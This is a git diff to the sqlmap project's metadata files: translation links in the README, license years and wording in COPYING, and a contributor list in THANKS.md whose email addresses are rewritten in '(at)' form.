diff --git a/.gitattributes b/.gitattributes
index 8b6e58fe0..a6b6a3526 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,4 +1,5 @@
 *.py text eol=lf
+*.conf text eol=lf
 
 *_ binary
 *.dll binary
diff --git a/README.md b/README.md
index a620dc945..8115c5dd5 100644
--- a/README.md
+++ b/README.md
@@ -55,5 +55,8 @@ Links
 Translations
 ----
 
-* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
diff --git a/doc/COPYING b/doc/COPYING
index 38a61d291..880d8774b 100644
--- a/doc/COPYING
+++ b/doc/COPYING
@@ -1,12 +1,12 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
-Software Foundation; Version 2 with the clarifications and exceptions
-described below. This guarantees your right to use, modify, and
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
 redistribute this software under certain conditions. If you wish to embed
 sqlmap technology into proprietary software, we sell alternative licenses
 (contact sales@sqlmap.org).
diff --git a/doc/THANKS.md b/doc/THANKS.md
index e90ff7f88..931ab73bc 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -1,777 +1,796 @@
 # Individuals
 
-Andres Tarasco Acuna, <atarasco@gmail.com>
+Andres Tarasco Acuna, <atarasco(at)gmail.com>
 * for suggesting a feature
 
-Santiago Accurso, <saccurso@skygear.com.ar>
+Santiago Accurso, <saccurso(at)skygear.com.ar>
 * for reporting a bug
 
-Syed Afzal, <syed@syedafzal.in>
+Syed Afzal, <syed(at)syedafzal.in>
 * for contributing a WAF script varnish.py
 
-Zaki Akhmad, <zakiakhmad@gmail.com>
+Zaki Akhmad, <zakiakhmad(at)gmail.com>
 * for suggesting a couple of features
 
-Olu Akindeinde, <seyi.akin@gmail.com>
+Olu Akindeinde, <seyi.akin(at)gmail.com>
 * for reporting a couple of bugs
 
-David Alvarez, <david.alvarez.s@gmail.com>
+David Alvarez, <david.alvarez.s(at)gmail.com>
 * for reporting a bug
 
-Sergio Alves, <sergioalexandre.alves@gmail.com>
+Sergio Alves, <sergioalexandre.alves(at)gmail.com>
 * for reporting a bug
 
-Thomas Anderson, <darkc0de@live.com.ph>
+Thomas Anderson, <darkc0de(at)live.com.ph>
 * for reporting a bug
 
-Chip Andrews, <chip@sqlsecurity.com>
+Chip Andrews, <chip(at)sqlsecurity.com>
 * for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
 
-Smith Andy, <teh.one@hotmail.com>
+Smith Andy, <teh.one(at)hotmail.com>
 * for suggesting a feature
 
-Otavio Augusto, <otavioarj@gmail.com>
+Otavio Augusto, <otavioarj(at)gmail.com>
 * for reporting a minor bug
 
-Simon Baker, <simonb@sec-1.com>
+Simon Baker, <simonb(at)sec-1.com>
 * for reporting some bugs
 
-Ryan Barnett, <RBarnett@trustwave.com>
+Ryan Barnett, <RBarnett(at)trustwave.com>
 * for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
 
-Emiliano Bazaes, <emiliano@7espejos.com>
+Emiliano Bazaes, <emiliano(at)7espejos.com>
 * for reporting a minor bug
 
-Daniele Bellucci, <daniele.bellucci@gmail.com>
+Daniele Bellucci, <daniele.bellucci(at)gmail.com>
 * for starting sqlmap project and developing it between July and August 2006
 
-Sebastian Bittig, <s.bittig@r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
+Sebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
 * for contributing the DB2 support initial patch: fingerprint and enumeration
 
-Anthony Boynes, <aboynes@gmail.com>
+Anthony Boynes, <aboynes(at)gmail.com>
 * for reporting several bugs
 
 Marcelo Toscani Brandao
 * for reporting a bug
 
-Velky Brat, <velkybrat@gmail.com>
+Velky Brat, <velkybrat(at)gmail.com>
 * for suggesting a minor enhancement to the bisection algorithm
 
-James Briggs, <james.briggs@ngssecure.com>
+James Briggs, <james.briggs(at)ngssecure.com>
 * for suggesting a minor enhancement
 
-Gianluca Brindisi, <g@brindi.si>
+Gianluca Brindisi, <g(at)brindi.si>
 * for reporting a couple of bugs
 
-Jack Butler, <fattredd@hotmail.com>
+Jack Butler, <fattredd(at)hotmail.com>
 * for contributing the sqlmap site favicon
 
-Ulisses Castro, <uss.thebug@gmail.com>
+Ulisses Castro, <uss.thebug(at)gmail.com>
 * for reporting a bug
 
-Roberto Castrogiovanni, <castrogiovanni.roberto@gmail.com>
+Roberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>
 * for reporting a minor bug
 
-Cesar Cerrudo, <cesar@argeniss.com>
+Cesar Cerrudo, <cesar(at)argeniss.com>
 * for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
 
-Karl Chen, <quarl@cs.berkeley.edu>
+Karl Chen, <quarl(at)cs.berkeley.edu>
 * for contributing the initial multi-threading patch for the inference algorithm
 
-Y P Chien, <ypchien@cox.net>
+Y P Chien, <ypchien(at)cox.net>
 * for reporting a minor bug
 
-Pierre Chifflier, <pollux@debian.org> and Mark Hymers, <ftpmaster@debian.org>
+Pierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>
 * for uploading and accepting the sqlmap Debian package to the official Debian project repository
 
-Hysia Chow <hysia@icloud.com>
+Hysia Chow <hysia(at)icloud.com>
 * for contributing a couple of WAF scripts
 
-Chris Clements, <cclements@flatearth.net>
+Chris Clements, <cclements(at)flatearth.net>
 * for reporting a couple of bugs
 
-John Cobb, <johnc@nobytes.com>
+John Cobb, <johnc(at)nobytes.com>
 * for reporting a minor bug
 
-Andreas Constantinides, <megahz@megahz.org>
+Andreas Constantinides, <megahz(at)megahz.org>
 * for reporting a minor bug
 
-Andre Costa, <andre.investorsclub@gmail.com>
+Andre Costa, <andre.investorsclub(at)gmail.com>
 * for reporting a minor bug
 * for suggesting a minor enhancement
 
-Ulises U. Cune, <ulises2k@gmail.com>
+Ulises U. Cune, <ulises2k(at)gmail.com>
 * for reporting a bug
 
-Alessandro Curio, <alessandro.curio@gmail.com>
+Alessandro Curio, <alessandro.curio(at)gmail.com>
 * for reporting a minor bug
 
-Alessio Dalla Piazza, <alessio.dallapiazza@gmail.com>
+Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
 * for reporting a couple of bugs
 
-Sherif El-Deeb, <archeldeeb@gmail.com>
+Sherif El-Deeb, <archeldeeb(at)gmail.com>
 * for reporting a minor bug
 
-Stefano Di Paola, <stefano.dipaola@wisec.it>
+Stefano Di Paola, <stefano.dipaola(at)wisec.it>
 * for suggesting good features
 
-Mosk Dmitri, <ya@darkbyte.ru>
+Mosk Dmitri, <ya(at)darkbyte.ru>
 * for reporting a minor bug
 
-Meng Dong, <whenov@gmail.com>
+Meng Dong, <whenov(at)gmail.com>
 * for contributing a code for Waffit integration
 
-Carey Evans, <careye@spamcop.net>
+Carey Evans, <careye(at)spamcop.net>
 * for his fcrypt module that allows crypt(3) support
     on Windows platforms
 
-Shawn Evans, <shawndevans@gmail.com>
+Shawn Evans, <shawndevans(at)gmail.com>
 * for suggesting an idea for one tamper script, greatest.py
 
-Adam Faheem, <faheem.adam@is.co.za>
+Adam Faheem, <faheem.adam(at)is.co.za>
 * for reporting a few bugs
 
-James Fisher, <www@sittinglittleduck.com>
+James Fisher, <www(at)sittinglittleduck.com>
 * for contributing two very good feature requests
 * for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
 
-Jim Forster, <jimforster@goldenwest.com>
+Jim Forster, <jimforster(at)goldenwest.com>
 * for reporting a bug
 
-Rong-En Fan, <rafan@freebsd.org>
+Rong-En Fan, <rafan(at)freebsd.org>
 * for commiting the sqlmap 0.5 port to the official FreeBSD project repository
 
-Giorgio Fedon, <giorgio.fedon@gmail.com>
+Giorgio Fedon, <giorgio.fedon(at)gmail.com>
 * for suggesting a speed improvement for bisection algorithm
 * for reporting a bug when running against Microsoft SQL Server 2005
 
-Kasper Fons, <thefeds@mail.dk>
+Kasper Fons, <thefeds(at)mail.dk>
 * for reporting several bugs
 
-Jose Fonseca, <jose.r.fonseca@gmail.com>
+Jose Fonseca, <jose.r.fonseca(at)gmail.com>
 * for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
     http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
     http://code.google.com/p/jrfonseca/wiki/XDot
 
-Alan Franzoni, <alan.franzoni@gmail.com>
-* for helping me out with Python subprocess library
+Alan Franzoni, <alan.franzoni(at)gmail.com>
+* for helping out with Python subprocess library
 
-Harold Fry, <harold@violaceo.us>
+Harold Fry, <harold(at)violaceo.us>
 * for suggesting a minor enhancement
 
-Daniel G. Gamonal, <lgrecol@gmail.com>
+Daniel G. Gamonal, <lgrecol(at)gmail.com>
 * for reporting a minor bug
 
-Marcos Mateos Garcia, <mmateos@germinus.com>
+Marcos Mateos Garcia, <mmateos(at)germinus.com>
 * for reporting a minor bug
 
-Andrew Gecse, <andrew.gecse@upcmail.hu>
+Andrew Gecse, <andrew.gecse(at)upcmail.hu>
 * for reporting a minor issue
 
-Ivan Giacomelli, <truemilk@insiberia.net>
+Ivan Giacomelli, <truemilk(at)insiberia.net>
 * for reporting a bug
 * for suggesting a minor enhancement
 * for reviewing the documentation
 
-Nico Golde, <nico@ngolde.de>
+Nico Golde, <nico(at)ngolde.de>
 * for reporting a couple of bugs
 
-Oliver Gruskovnjak, <oliver.gruskovnjak@gmail.com>
+Oliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>
 * for reporting a bug
 * for contributing a minor patch
 
-Davide Guerri, <d.guerri@caspur.it>
+Davide Guerri, <d.guerri(at)caspur.it>
 * for suggesting an enhancement
 
-Dan Guido, <dguido@gmail.com>
+Dan Guido, <dguido(at)gmail.com>
 * for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
 
-David Guimaraes, <skysbsb@gmail.com>
+David Guimaraes, <skysbsb(at)gmail.com>
 * for reporting considerable amount of bugs
 * for suggesting several features
 
-Chris Hall, <chris.hall@mod10.net>
+Chris Hall, <chris.hall(at)mod10.net>
 * for coding the prettyprint.py library
 
-Tate Hansen, <tate@clearnetsec.com>
+Tate Hansen, <tate(at)clearnetsec.com>
 * for donating to sqlmap development
 
-Mario Heiderich, <mario.heiderich@gmail.com>
-Christian Matthies, <ch0012@gmail.com>
-Lars H. Strojny, <lars@strojny.net>
+Mario Heiderich, <mario.heiderich(at)gmail.com>
+Christian Matthies, <ch0012(at)gmail.com>
+Lars H. Strojny, <lars(at)strojny.net>
 * for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
 
-Kristian Erik Hermansen, <kristian.hermansen@gmail.com>
+Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
 * for reporting a bug
 * for donating to sqlmap development
 
-Alexander Hagenah, <ah@primepage.de>
+Alexander Hagenah, <ah(at)primepage.de>
 * for reporting a minor bug
 
-Dennis Hecken, <mail@8dh.de>
+Dennis Hecken, <mail(at)8dh.de>
 * for reporting a minor bug
 
-Choi Ho, <counterhacker815@gmail.com>
+Choi Ho, <counterhacker815(at)gmail.com>
 * for reporting a minor bug
 
-Jorge Hoya, <aquinadie@gmail.com>
+Jorge Hoya, <aquinadie(at)gmail.com>
 * for suggesting a minor enhancement
 
-Will Holcomb, <wholcomb@gmail.com>
+Will Holcomb, <wholcomb(at)gmail.com>
 * for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
 
-Daniel Huckmann, <sanitybit@gmail.com>
+Daniel Huckmann, <sanitybit(at)gmail.com>
 * for reporting a couple of bugs
 
-Daliev Ilya, <daliser@yandex.ru>
+Daliev Ilya, <daliser(at)yandex.ru>
 * for reporting a bug
 
-Jovon Itwaru, <jovon.itwaru@gmail.com>
+Mehmet İnce, <mehmet(at)mehmetince.net>
+* for contributing a tamper script xforwardedfor.py
+
+Jovon Itwaru, <jovon.itwaru(at)gmail.com>
 * for reporting a minor bug
 
-Prashant Jadhav, <prashantjadhav.82@gmail.com>
+Prashant Jadhav, <prashantjadhav.82(at)gmail.com>
 * for reporting a bug
 
-Dirk Jagdmann, <doj@cubic.org>
+Dirk Jagdmann, <doj(at)cubic.org>
 * for reporting a typo in the documentation
 
-Luke Jahnke, <luke.jahnke@gmail.com>
+Luke Jahnke, <luke.jahnke(at)gmail.com>
 * for reporting a bug when running against MySQL < 5.0
 
-Andrew Kitis <andrew.kitis@gmail.com>
+Andrew Kitis <andrew.kitis(at)gmail.com>
 * for contributing a tamper script lowercase.py
 
-David Klein, <david.klein@ipfocus.com.au>
+David Klein, <david.klein(at)ipfocus.com.au>
 * for reporting a minor code improvement
 
-Sven Klemm, <sven@c3d2.de>
+Sven Klemm, <sven(at)c3d2.de>
 * for reporting two minor bugs with PostgreSQL
 
-Anant Kochhar, <anant.kochhar@secureyes.net>
+Anant Kochhar, <anant.kochhar(at)secureyes.net>
 * for providing with feedback on the user's manual
 
-Dmitriy Kononov, <dmitriyknnv@gmail.com>
+Dmitriy Kononov, <dmitriyknnv(at)gmail.com>
 * for reporting a minor bug
 
-Alexander Kornbrust, <ak@red-database-security.com>
+Alexander Kornbrust, <ak(at)red-database-security.com>
 * for reporting a couple of bugs
 
-Krzysztof Kotowicz, <kkotowicz@gmail.com>
+Krzysztof Kotowicz, <kkotowicz(at)gmail.com>
 * for reporting a minor bug
 
-Nicolas Krassas, <krasn@deventum.com>
+Nicolas Krassas, <krasn(at)deventum.com>
 * for reporting a couple of bugs
 
-Oliver Kuckertz, <oliver.kuckertz@mologie.de>
+Oliver Kuckertz, <oliver.kuckertz(at)mologie.de>
 * for contributing a minor patch
 
-Alex Landa, <landa.alex86@gmail.com>
+Alex Landa, <landa.alex86(at)gmail.com>
 * for contributing a patch adding beta support for XML output
 
-Guido Landi, <lists@keamera.org>
+Guido Landi, <lists(at)keamera.org>
 * for reporting a couple of bugs
 * for the great technical discussions
 * for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
-* for presenting with me at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
+* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
 
-Lee Lawson, <Lee.Lawson@dns.co.uk>
+Lee Lawson, <Lee.Lawson(at)dns.co.uk>
 * for reporting a minor bug
 
-John J. Lee, <jjl@pobox.com> and others
+John J. Lee, <jjl(at)pobox.com> and others
 * for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
 
-Nico Leidecker, <nico@leidecker.info>
+Nico Leidecker, <nico(at)leidecker.info>
 * for providing with feedback on a few features
 * for reporting a couple of bugs
 * for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
 
-Gabriel Lima, <pato@bugnet.com.br>
+Gabriel Lima, <pato(at)bugnet.com.br>
 * for reporting a couple of bugs
 
-Svyatoslav Lisin, <sel@3d-tech.ru>
+Svyatoslav Lisin, <sel(at)3d-tech.ru>
 * for suggesting a minor feature
 
-Miguel Lopes, <theoverblue@gmail.com>
+Miguel Lopes, <theoverblue(at)gmail.com>
 * for reporting a minor bug
 
-Truong Duc Luong, <luongductruong@gmail.com>
+Truong Duc Luong, <luongductruong(at)gmail.com>
 * for reporting a minor bug
 
-Pavol Luptak, <pavol.luptak@nethemba.com>
+Pavol Luptak, <pavol.luptak(at)nethemba.com>
 * for reporting a bug when injecting on a POST data parameter
 
-Till Maas, <opensource@till.name>
+Till Maas, <opensource(at)till.name>
 * for suggesting a minor feature
 
-Michael Majchrowicz, <mmajchrowicz@gmail.com>
+Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
 * for extensively beta-testing sqlmap on various MySQL DBMS
 * for providing really appreciated feedback
 * for suggesting a lot of ideas and features
 
-Vinícius Henrique Marangoni, <vinicius_marangoni1@hotmail.com>
+Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
 * for contributing a Portuguese translation of README.md
 
-Ahmad Maulana, <matdhule@gmail.com>
+Ahmad Maulana, <matdhule(at)gmail.com>
 * for contributing a tamper script halfversionedmorekeywords.py
 
-Ferruh Mavituna, <ferruh@mavituna.com>
+Ferruh Mavituna, <ferruh(at)mavituna.com>
 * for exchanging ideas on the implementation of a couple of features
 
-David McNab, <david@conscious.co.nz>
+David McNab, <david(at)conscious.co.nz>
 * for his XMLObject module that allows XML files to be operated on  like Python objects
 
-Spencer J. McIntyre, <smcintyre@securestate.com>
+Spencer J. McIntyre, <smcintyre(at)securestate.com>
 * for reporting a minor bug
 * for contributing a patch for OS fingerprinting on DB2
 
-Brad Merrell, <bradmer12@gmail.com>
+Brad Merrell, <bradmer12(at)gmail.com>
 * for reporting a minor bug
 
-Michael Meyer, <m.meyer2k@gmail.com>
+Michael Meyer, <m.meyer2k(at)gmail.com>
 * for suggesting a minor feature
 
-Enrico Milanese, <enricomilanese@gmail.com>
+Enrico Milanese, <enricomilanese(at)gmail.com>
 * for reporting a minor bug
 * for sharing some ideas for the PHP backdoor
 
-Liran Mimoni, <reactor.leet@gmail.com>
+Liran Mimoni, <reactor.leet(at)gmail.com>
 * for reporting a minor bug
 
-Marco Mirandola, <mmmccc0@gmail.com>
+Marco Mirandola, <mmmccc0(at)gmail.com>
 * for reporting a minor bug
 
-Devon Mitchell, <devon.mitchell1988@yahoo.com>
+Devon Mitchell, <devon.mitchell1988(at)yahoo.com>
 * for reporting a minor bug
 
-Anton Mogilin, <azarmaster81@yahoo.com>
+Anton Mogilin, <azarmaster81(at)yahoo.com>
 * for reporting a few bugs
 
-Sergio Molina, <smolina@wpr.es>
+Sergio Molina, <smolina(at)wpr.es>
 * for reporting a minor bug
 
-Anastasios Monachos, <anastasiosm@gmail.com>
+Anastasios Monachos, <anastasiosm(at)gmail.com>
 * for providing some useful data
 * for suggesting a feature
 * for reporting a couple of bugs
 
-Kirill Morozov, <l0rda@l0rda.biz>
+Kirill Morozov, <l0rda(at)l0rda.biz>
 * for reporting a bug
 * for suggesting a feature
 
-Alejo Murillo Moya, <alex@65535.com>
+Alejo Murillo Moya, <alex(at)65535.com>
 * for reporting a minor bug
 * for suggesting a few features
 
-Yonny Mutai, <yonnym@googlemail.com>
+Yonny Mutai, <yonnym(at)googlemail.com>
 * for reporting a minor bug
 
-Roberto Nemirovsky, <roberto.paes@gmail.com>
-* for pointing me out some enhancements
+Roberto Nemirovsky, <roberto.paes(at)gmail.com>
+* for pointing out some enhancements
 
-Simone Onofri, <simone.onofri@gmail.com>
+Sebastian Nerz, <sebastian.nerz(at)syss.de>
+* for reporting a (potential) vulnerability in --eval
+
+Simone Onofri, <simone.onofri(at)gmail.com>
 * for patching the PHP web backdoor to make it work properly also on Windows
 
-Michele Orru, <michele.orru@antisnatchor.com>
+Michele Orru, <michele.orru(at)antisnatchor.com>
 * for reporting a couple of bug
 * for suggesting ideas on how to implement the RESTful API
 
-Shaohua Pan, <pan@knownsec.com>
+Shaohua Pan, <pan(at)knownsec.com>
 * for reporting several bugs
 * for suggesting a few features
 
-Antonio Parata, <s4tan@ictsc.it>
+Antonio Parata, <s4tan(at)ictsc.it>
 * for sharing some ideas for the PHP backdoor
 
-Adrian Pastor, <ap@gnucitizen.org>
+Adrian Pastor, <ap(at)gnucitizen.org>
 * for donating to sqlmap development
 
-Christopher Patten, <cpatten@sunera.com>
+Christopher Patten, <cpatten(at)sunera.com>
 * for reporting a bug in the blind SQL injection bisection algorithm
 
-Zack Payton, <zack.payton@executiveinstruments.com>
+Zack Payton, <zack.payton(at)executiveinstruments.com>
 * for reporting a minor bug
 
-Jaime Penalba, <nighterman@painsec.com>
+Jaime Penalba, <nighterman(at)painsec.com>
 * for contributing a patch for INSERT/UPDATE generic boundaries
 
-Pedrito Perez, <0ark1ang3l@gmail.com>
+Pedrito Perez, <0ark1ang3l(at)gmail.com>
 * for reporting a couple of bugs
 
-Brandon Perry, <bperry.volatile@gmail.com>
+Brandon Perry, <bperry.volatile(at)gmail.com>
 * for reporting a couple of bugs
 
-Travis Phillips, <perfect_insanity2004@yahoo.com>
+Travis Phillips, <perfect_insanity2004(at)yahoo.com>
 * for suggesting a minor enhancement
 
-Mark Pilgrim, <mark@diveintomark.org>
+Mark Pilgrim, <mark(at)diveintomark.org>
 * for porting chardet package (Universal Encoding Detector) to Python
 
-Steve Pinkham, <steve.pinkham@gmail.com>
+Steve Pinkham, <steve.pinkham(at)gmail.com>
 * for suggesting a feature
 * for contributing a new SQL injection vector (MSSQL time-based blind)
 * for donating to sqlmap development
 
-Adam Pridgen, <adam.pridgen@gmail.com>
+Adam Pridgen, <adam.pridgen(at)gmail.com>
 * for suggesting some features
 
-Luka Pusic, <luka@pusic.si>
+Luka Pusic, <luka(at)pusic.si>
 * for reporting a couple of bugs
 
-Ole Rasmussen, <olerass@gmail.com>
+Ole Rasmussen, <olerass(at)gmail.com>
 * for reporting a bug
 * for suggesting a feature
 
-Alberto Revelli, <r00t@northernfortress.net>
-* for inspiring me to write sqlmap user's manual in SGML
+Alberto Revelli, <r00t(at)northernfortress.net>
+* for inspiring to write sqlmap user's manual in SGML
 * for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
 
-David Rhoades, <david.rhoades@mavensecurity.com>
+David Rhoades, <david.rhoades(at)mavensecurity.com>
 * for reporting a bug
 
-Andres Riancho, <andres.riancho@gmail.com>
+Andres Riancho, <andres.riancho(at)gmail.com>
 * for beta-testing sqlmap
 * for reporting a bug and suggesting some features
 * for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
 * for suggesting a way for handling DNS caching
 
-Jamie Riden, <jamie.riden@ngssecure.com>
+Jamie Riden, <jamie.riden(at)ngssecure.com>
 * for reporting a minor bug
 
-Alexander Rigbo, <alex@rigbo.se>
+Alexander Rigbo, <alex(at)rigbo.se>
 * for contributing a minor patch
 
-Antonio Riva, <antonio.riva@gmail.com>
+Antonio Riva, <antonio.riva(at)gmail.com>
 * for reporting a bug when running with python 2.5
 
-Ethan Robish, <ethan.robish@gmail.com>
+Ethan Robish, <ethan.robish(at)gmail.com>
 * for reporting a bug
 
-Levente Rog, <levidos@gmail.com>
+Levente Rog, <levidos(at)gmail.com>
 * for reporting a minor bug
 
-Andrea Rossi, <andyroyalbattle@yahoo.it>
+Andrea Rossi, <andyroyalbattle(at)yahoo.it>
 * for reporting a minor bug
 * for suggesting a feature
 
-Frederic Roy, <frederic.roy@telindus.fr>
+Frederic Roy, <frederic.roy(at)telindus.fr>
 * for reporting a couple of bugs
 
-Vladimir Rutsky, <rutsky.vladimir@gmail.com>
+Vladimir Rutsky, <rutsky.vladimir(at)gmail.com>
 * for suggesting a couple of minor enhancements
 
-Richard Safran, <allapplyhere@yahoo.com>
+Richard Safran, <allapplyhere(at)yahoo.com>
 * for donating the sqlmap.org domain
 
-Tomoyuki Sakurai, <cherry@trombik.org>
+Tomoyuki Sakurai, <cherry(at)trombik.org>
 * for submitting to the FreeBSD project the sqlmap 0.5 port
 
-Roberto Salgado, <lightos@gmail.com>
+Roberto Salgado, <lightos(at)gmail.com>
 * for contributing considerable amount of tamper scripts
 
-Pedro Jacques Santos Santiago, <pedro__jacques@hotmail.com>
+Pedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>
 * for reporting considerable amount of bugs
 
-Marek Sarvas, <marek.sarvas@gmail.com>
+Marek Sarvas, <marek.sarvas(at)gmail.com>
 * for reporting several bugs
 
-Philippe A. R. Schaeffer, <schaeff@compuphil.de>
+Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
 * for reporting a minor bug
 
-Mohd Zamiri Sanin, <zamiri.sanin@gmail.com>
+Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
 * for reporting a minor bug
 
-Jorge Santos, <jorge_a_santos@hotmail.com>
+Jorge Santos, <jorge_a_santos(at)hotmail.com>
 * for reporting a minor bug
 
-Sven Schluter, <sschlueter@netzwerk.cc>
+Sven Schluter, <sschlueter(at)netzwerk.cc>
 * for contributing a patch
 * for waiting a number of seconds between each HTTP request
 
-Ryan Sears, <rdsears@mtu.edu>
+Ryan Sears, <rdsears(at)mtu.edu>
 * for suggesting a couple of enhancements
 * for donating to sqlmap development
 
-Uemit Seren, <uemit.seren@gmail.com>
+Uemit Seren, <uemit.seren(at)gmail.com>
 * for reporting a minor adjustment when running with python 2.6
 
-Shane Sewell, <ssewell@gmail.com>
+Shane Sewell, <ssewell(at)gmail.com>
 * for suggesting a feature
 
-Ahmed Shawky, <ahmed@isecur1ty.org>
+Ahmed Shawky, <ahmed(at)isecur1ty.org>
 * for reporting a major bug with improper handling of parameter values
 * for reporting a bug
 
-Brian Shura, <bshura@appsecconsulting.com>
+Brian Shura, <bshura(at)appsecconsulting.com>
 * for reporting a bug
 
-Sumit Siddharth, <sid@notsosecure.com>
+Sumit Siddharth, <sid(at)notsosecure.com>
 * for sharing ideas on the implementation of a couple of features
 
-Andre Silva, <andreoaz@gmail.com>
+Andre Silva, <andreoaz(at)gmail.com>
 * for reporting a bug
 
-Benjamin Silva H. <silva96@gmail.com>
+Benjamin Silva H. <silva96(at)gmail.com>
 * for reporting a bug
 
-Duarte Silva <duarte.silva@serializing.me>
+Duarte Silva <duarte.silva(at)serializing.me>
 * for reporting a couple of bugs
 
-M Simkin, <mlsimkin@cox.net>
+M Simkin, <mlsimkin(at)cox.net>
 * for suggesting a feature
 
-Konrads Smelkovs, <konrads@smelkovs.com>
+Konrads Smelkovs, <konrads(at)smelkovs.com>
 * for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
 
-Chris Spencer, <chris.spencer@ngssecure.com>
+Chris Spencer, <chris.spencer(at)ngssecure.com>
 * for reviewing the user's manual grammar
 
-Michael D. Stenner, <mstenner@linux.duke.edu>
+Michael D. Stenner, <mstenner(at)linux.duke.edu>
 * for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
 
-Marek Stiefenhofer, <m.stiefenhofer@r-tec.net>
+Marek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>
 * for reporting a few bugs
 
-Jason Swan, <jasoneswan@gmail.com>
+Jason Swan, <jasoneswan(at)gmail.com>
 * for reporting a bug when enumerating columns on Microsoft SQL Server
 * for suggesting a couple of improvements
 
-Chilik Tamir, <phenoman@gmail.com>
+Chilik Tamir, <phenoman(at)gmail.com>
 * for contributing a patch for initial support SOAP requests
 
-Alessandro Tanasi, <alessandro@tanasi.it>
+Alessandro Tanasi, <alessandro(at)tanasi.it>
 * for extensively beta-testing sqlmap
 * for suggesting many features and reporting some bugs
 * for reviewing the documentation
 
-Andres Tarasco, <atarasco@gmail.com>
+Andres Tarasco, <atarasco(at)gmail.com>
 * for contributing good feedback
 
-Tom Thumb, <k1971@live.co.uk>
+Tom Thumb, <k1971(at)live.co.uk>
 * for reporting a major bug
 
-Kazim Bugra Tombul, <mhackmail@gmail.com>
+Kazim Bugra Tombul, <mhackmail(at)gmail.com>
 * for reporting a minor bug
 
-Efrain Torres, <et@metasploit.com>
-* for helping me out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
+Efrain Torres, <et(at)metasploit.com>
+* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
 * for his great Metasploit WMAP Framework
 
-Sandro Tosi, <matrixhasu@gmail.com>
+Sandro Tosi, <matrixhasu(at)gmail.com>
 * for helping to create sqlmap Debian package correctly
 
-Jacco van Tuijl, <jaccovantuijl@gmail.com>
+Jacco van Tuijl, <jaccovantuijl(at)gmail.com>
 * for reporting several bugs
 
-Vitaly Turenko, <dsu@dsu.com.ua>
+Vitaly Turenko, <dsu(at)dsu.com.ua>
 * for reporting a bug
 
-Augusto Urbieta, <x2xpy50@gmail.com>
+Augusto Urbieta, <x2xpy50(at)gmail.com>
 * for reporting a minor bug
 
-Bedirhan Urgun, <bedirhanurgun@gmail.com>
+Bedirhan Urgun, <bedirhanurgun(at)gmail.com>
 * for reporting a few bugs
 * for suggesting some features and improvements
 * for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 
-Kyprianos Vasilopoulos, <kyprianos.vasilopoulos@gmail.com>
+Kyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>
 * for reporting a couple of minor bugs
 
